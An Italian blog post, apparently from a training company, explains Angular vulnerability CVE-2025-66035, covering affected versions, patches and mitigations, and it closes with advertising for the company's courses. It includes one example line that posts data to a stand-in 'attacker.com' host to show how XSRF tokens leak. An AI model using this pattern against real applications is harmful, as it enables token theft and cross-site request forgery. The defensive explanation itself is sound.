Vulnerabilità Angular CVE-2025-66035

Vulnerabilità Angular CVE-2025-66035: Come Proteggere le Tue Applicazioni Enterprise

Indice dei Contenuti

1. Introduzione alla vulnerabilità CVE-2025-66035
2. Contesto tecnico: i meccanismi di protezione XSRF in Angular
3. Anatomia della vulnerabilità: il problema degli URL protocol-relative
4. Impatto e rischi per le applicazioni enterprise
5. Versioni di Angular interessate e cronologia della scoperta
6. Soluzioni tecniche e best practice per la mitigazione
7. Procedura di aggiornamento e verifica della sicurezza
8. L’importanza della formazione continua in cybersecurity

1. Introduzione alla vulnerabilità CVE-2025-66035

La sicurezza delle applicazioni web moderne rappresenta una priorità assoluta per qualsiasi organizzazione che gestisca dati sensibili e servizi critici. Il 26 novembre 2025, il team di Angular ha pubblicato un bollettino di sicurezza ad alta gravità riguardante una vulnerabilità identificata come CVE-2025-66035, con codice GHSA-58c5-g7wp-6w37 nel database delle advisory di sicurezza di GitHub.

Questa vulnerabilità, classificata con un punteggio CVSS di 7.5 (gravità alta), riguarda il componente HttpClient del framework Angular e consente la potenziale esposizione dei token XSRF (Cross-Site Request Forgery) verso domini controllati da attaccanti. L’Agenzia per la Cybersicurezza Nazionale italiana ha immediatamente diramato un alert ufficiale, sottolineando la necessità di interventi tempestivi per tutte le organizzazioni che utilizzano Angular nelle proprie infrastrutture digitali.

Per gli sviluppatori Angular e i team di sicurezza IT, comprendere a fondo questa vulnerabilità e implementare le corrette misure di mitigazione è fondamentale per preservare l’integrità delle applicazioni enterprise e proteggere i dati degli utenti.

2. Contesto tecnico: i meccanismi di protezione XSRF in Angular

Prima di analizzare la vulnerabilità specifica, è essenziale comprendere come Angular implementa la protezione contro gli attacchi CSRF (Cross-Site Request Forgery). Angular HttpClient include un meccanismo di sicurezza integrato che opera automaticamente per difendere le applicazioni da questo tipo di minaccia.

Il sistema funziona attraverso l’utilizzo di token XSRF: quando un’applicazione Angular effettua richieste HTTP verso il proprio server, il framework aggiunge automaticamente un token di sicurezza nell’header X-XSRF-TOKEN. Il server backend può quindi validare questo token per confermare che la richiesta provenga effettivamente dall’applicazione legittima e non da un sito malevolo che tenta di sfruttare una sessione utente attiva.

La logica di sicurezza implementata da Angular prevede che il token XSRF venga incluso solamente nelle richieste verso la stessa origine (same-origin), mentre viene omesso per le richieste verso domini esterni. Questa distinzione è cruciale: inviare il token verso siti di terze parti comprometterebbe completamente il meccanismo di protezione, permettendo ad attaccanti di catturare credenziali valide.

3. Anatomia della vulnerabilità: il problema degli URL protocol-relative

La vulnerabilità CVE-2025-66035 risiede precisamente nel meccanismo di rilevamento delle richieste cross-origin all’interno della funzione xsrfInterceptorFn, localizzata nel file packages/common/http/src/xsrf.ts del codice sorgente di Angular.

Il codice originale verificava se un URL iniziasse con “http://” o “https://” per determinare se si trattasse di una richiesta esterna. In caso affermativo, il token XSRF veniva correttamente omesso. Tuttavia, questa logica presentava un punto cieco critico: gli URL protocol-relative, ovvero quegli URL che iniziano con doppio slash “//” senza specificare esplicitamente il protocollo.

Gli URL protocol-relative sono una sintassi valida nel web che eredita il protocollo dalla pagina corrente. Ad esempio, l’URL “//example.com/api” diventa “https://example.com/api” se la pagina è caricata via HTTPS, oppure “http://example.com/api” se caricata via HTTP. Questa caratteristica, pensata per semplificare la gestione dei protocolli, si è rivelata una vulnerabilità quando combinata con la logica di rilevamento implementata in Angular.

Quando un’applicazione Angular veniva indotta a effettuare una richiesta verso un URL del tipo “//attacker.com”, la funzione xsrfInterceptorFn non riconosceva questo pattern come URL esterno e trattava erroneamente la richiesta come same-origin. Di conseguenza, il token XSRF veniva automaticamente allegato all’header della richiesta, esponendo le credenziali di sicurezza verso un server controllato dall’attaccante.

Un esempio semplificato della problematica:

// Codice vulnerabile - da NON utilizzare
this.http.post('//attacker.com/steal-token', data);
// Angular invia erroneamente il token XSRF verso attacker.com

4. Impatto e rischi per le applicazioni enterprise

L’impatto di questa vulnerabilità sulle applicazioni enterprise è significativo e merita un’analisi approfondita. Una volta che un attaccante riesce a catturare un token XSRF valido, la protezione integrata di Angular contro gli attacchi CSRF viene completamente aggirata.

Le conseguenze pratiche includono la possibilità per un attaccante di eseguire operazioni non autorizzate a nome dell’utente vittima. Questo può tradursi in modifiche ai dati aziendali, trasferimenti finanziari non autorizzati, alterazioni delle configurazioni di sicurezza, o accesso a informazioni sensibili. In contesti enterprise, dove le applicazioni Angular gestiscono spesso processi business critici, l’esposizione può risultare particolarmente dannosa.

Le precondizioni per lo sfruttamento della vulnerabilità sono relativamente semplici: l’applicazione deve avere la protezione XSRF abilitata (configurazione standard in Angular) e l’attaccante deve essere in grado di far eseguire all’applicazione una richiesta HTTP verso un URL protocol-relative controllato. Questo può avvenire attraverso tecniche di social engineering, inserimento di contenuti malevoli, o sfruttamento di altre vulnerabilità come Cross-Site Scripting.

È importante sottolineare che non è necessaria alcuna interazione diretta dell’utente oltre alla normale navigazione nell’applicazione compromessa, rendendo l’attacco potenzialmente silenzioso e difficile da rilevare senza adeguati sistemi di monitoraggio.

5. Versioni di Angular interessate e cronologia della scoperta

La vulnerabilità CVE-2025-66035 interessa un’ampia gamma di versioni del framework Angular, rendendo necessaria una verifica immediata delle versioni in uso nelle proprie applicazioni.

Le versioni specificamente vulnerabili includono:

• Angular 21: dalla versione 21.0.0-next.0 fino alla 21.0.0
• Angular 20: dalla versione 20.0.0-next.0 fino alla 20.3.13
• Angular 19: dalla versione 19.0.0-next.0 fino alla 19.2.15
• Angular 18 e versioni precedenti: tutte le versioni fino alla 18.2.14

È particolarmente rilevante notare che Angular 18 e le versioni precedenti hanno raggiunto lo stato di End of Life, il che significa che non riceveranno patch ufficiali di sicurezza. Per queste versioni, le uniche opzioni sono l’implementazione di workaround o, preferibilmente, l’aggiornamento a una versione supportata.

La vulnerabilità è stata scoperta e segnalata dal membro del team Angular Alan Agius il 26 novembre 2025. La segnalazione è stata gestita attraverso il programma di sicurezza coordinato di GitHub, permettendo al team di sviluppo di preparare le patch necessarie prima della divulgazione pubblica. L’Agenzia per la Cybersicurezza Nazionale italiana ha emesso il proprio bollettino di allerta contestualmente alla pubblicazione dell’advisory ufficiale, in linea con le best practice internazionali di gestione delle vulnerabilità.

La rapidità con cui il team Angular ha risposto alla scoperta, rilasciando patch per tutte le versioni supportate nel giro di pochi giorni, dimostra l’impegno del progetto verso la sicurezza degli utenti.

6. Soluzioni tecniche e best practice per la mitigazione

La risoluzione della vulnerabilità CVE-2025-66035 richiede un approccio duplice: l’applicazione di patch ufficiali e l’implementazione di best practice di codifica sicura.

La soluzione permanente consiste nell’aggiornamento alle versioni corrette di Angular:

• Angular 21.0.1 o superiore
• Angular 20.3.14 o superiore
• Angular 19.2.16 o superiore

Queste versioni includono una correzione nella funzione xsrfInterceptorFn che introduce un’espressione regolare migliorata (ABSOLUTE_URL_REGEX) capace di identificare correttamente gli URL protocol-relative come richieste cross-origin, impedendo così l’allegamento del token XSRF.

Per le organizzazioni che non possono aggiornare immediatamente, esistono workaround efficaci che possono essere implementati come misure temporanee:

1. Evitare completamente l’uso di URL protocol-relative nel codice. Tutte le chiamate HTTP devono utilizzare URL relativi (che iniziano con un singolo “/”) o URL assoluti completamente qualificati con protocollo esplicito.
2. Implementare una revisione del codice per identificare tutti gli utilizzi di URL protocol-relative. Un semplice comando grep o una ricerca nel codebase per il pattern “//” può aiutare a individuare potenziali punti vulnerabili:

// Invece di:
const apiUrl = '//api.example.com/data';

// Utilizzare:
const apiUrl = 'https://api.example.com/data';
// oppure per chiamate interne:
const apiUrl = '/api/data';

3. Configurare policy di Content Security Policy (CSP) restrittive che limitino i domini verso cui l’applicazione può effettuare richieste HTTP, riducendo la superficie di attacco.
4. Implementare validazione lato server che verifichi non solo il token XSRF ma anche l’origine della richiesta attraverso gli header Origin e Referer.

7. Procedura di aggiornamento e verifica della sicurezza

L’aggiornamento di Angular alle versioni corrette richiede un approccio metodico per garantire sia la sicurezza che la stabilità dell’applicazione.

La procedura raccomandata prevede i seguenti passaggi:

• Prima fase – Verifica versione corrente: Identificare la versione di Angular attualmente in uso attraverso il file package.json o il comando ng version. Questo permetterà di determinare il percorso di aggiornamento ottimale.
• Seconda fase – Aggiornamento delle dipendenze: Utilizzare npm o yarn per aggiornare i pacchetti Angular alla versione corretta. Per Angular CLI, il comando ng update fornisce un meccanismo guidato che gestisce automaticamente le dipendenze correlate:
  ng update @angular/cli @angular/core
  Per aggiornamenti più controllati, è possibile specificare la versione target esatta:
  npm install @angular/common@21.0.1
npm install @angular/core@21.0.1

• Terza fase – Testing approfondito: Prima del deployment in produzione, è fondamentale eseguire test completi dell’applicazione. Particolare attenzione deve essere rivolta a:
• Tutte le chiamate HTTP verso API esterne
• Funzionalità che richiedono autenticazione
• Form che effettuano operazioni di modifica dati
• Integrazione con servizi di terze parti

• Quarta fase – Audit del codice: Eseguire una revisione del codice per identificare e correggere eventuali utilizzi di URL protocol-relative. Strumenti di analisi statica possono automatizzare questo processo.
• Quinta fase – Deployment graduale: Implementare l’aggiornamento seguendo una strategia di deployment progressivo, iniziando con ambienti di test, procedendo con staging, e infine production. Monitorare attentamente eventuali errori o comportamenti anomali dopo ogni fase.
• Sesta fase – Verifica post-deployment: Dopo il deployment, verificare che la protezione XSRF funzioni correttamente attraverso test di sicurezza specifici. Strumenti come OWASP ZAP possono essere utilizzati per verificare che i token XSRF siano gestiti correttamente.

8. L’importanza della formazione continua in cybersecurity

La scoperta della vulnerabilità CVE-2025-66035 evidenzia un aspetto cruciale spesso sottovalutato nelle organizzazioni: la formazione continua rappresenta il pilastro fondamentale di una strategia di sicurezza efficace. In un panorama tecnologico in costante evoluzione, dove framework come Angular rilasciano aggiornamenti frequenti e nuove vulnerabilità emergono regolarmente, mantenere il team IT aggiornato non è più un’opzione ma una necessità imprescindibile.

Le vulnerabilità nei framework moderni raramente derivano da errori grossolani, ma piuttosto da sottili interazioni tra componenti complessi, come nel caso degli URL protocol-relative. Solo un team adeguatamente formato può comprendere appieno le implicazioni di sicurezza delle proprie scelte architetturali e di implementazione.

La formazione continua permette ai team di sviluppo di:

• Comprendere in profondità i meccanismi di sicurezza integrati nei framework utilizzati
• Riconoscere pattern di codice potenzialmente vulnerabili durante le code review
• Implementare best practice di secure coding sin dalle prime fasi di sviluppo
• Reagire rapidamente ed efficacemente quando vengono scoperte nuove vulnerabilità
• Valutare criticamente l’impatto delle dipendenze di terze parti sulla sicurezza complessiva

Per supportare le aziende in questo percorso di crescita e consolidamento delle competenze, Innovaformazione offre percorsi formativi specificamente progettati per professionisti IT che lavorano con tecnologie moderne e vogliono mantenere elevati standard di sicurezza.

Il Corso Angular fornisce una comprensione completa del framework, inclusi gli aspetti di sicurezza spesso trascurati nella documentazione standard. Gli sviluppatori apprendono non solo come costruire applicazioni performanti, ma anche come implementare correttamente i meccanismi di protezione e riconoscere potenziali vulnerabilità.

Complementare a questo, il Corso OWASP Sicurezza Web App approfondisce sistematicamente le principali vulnerabilità delle applicazioni web seguendo le linee guida OWASP, l’organizzazione internazionale di riferimento per la sicurezza applicativa. Questo corso permette ai partecipanti di comprendere non solo il “come” ma anche il “perché” delle vulnerabilità, sviluppando un mindset di sicurezza che va oltre la semplice applicazione di checklist.

I corsi sono specificatamente rivolti ad aziende, con modalità di erogazione in classe virtuale online che permettono di formare interi team senza interruzioni operative significative. Il calendario è concordabile in base alle esigenze organizzative, garantendo la massima flessibilità.

Inoltre, Innovaformazione offre supporto completo per l’accesso ai fondi Fondimpresa, permettendo alle aziende di ottenere la formazione necessaria a costo zero attraverso i fondi interprofessionali. Questo rappresenta un’opportunità preziosa per investire nella crescita del proprio team IT senza impattare il budget formativo.

La vulnerabilità CVE-2025-66035 ci ricorda che la sicurezza non è mai un traguardo definitivo, ma un processo continuo di apprendimento, adattamento e miglioramento. Solo attraverso l’investimento nella formazione del proprio capitale umano le organizzazioni possono costruire una resilienza duratura contro le minacce emergenti.

Conclusione

La gestione tempestiva e consapevole delle vulnerabilità come la CVE-2025-66035 rappresenta la differenza tra un’organizzazione che subisce passivamente i rischi cyber e una che li gestisce proattivamente. L’aggiornamento immediato alle versioni corrette di Angular è il primo passo indispensabile, ma la vera sicurezza si costruisce attraverso una cultura aziendale che valorizza la formazione continua e l’eccellenza tecnica.

Per ricevere maggiori informazioni sui percorsi formativi, richiedere un preventivo personalizzato o discutere le specifiche esigenze del vostro team, vi invitiamo a contattare:

Email: info@innovaformazione.net Telefono: 347 101 2275 (Dario Carrassi)

Per rimanere aggiornati su altre tematiche tecniche e di sicurezza, consultate regolarmente il nostro blog QUI.

La sicurezza delle vostre applicazioni Angular inizia oggi, con le scelte che fate e la formazione in cui investite.

(fonte) (fonte) (fonte) (fonte)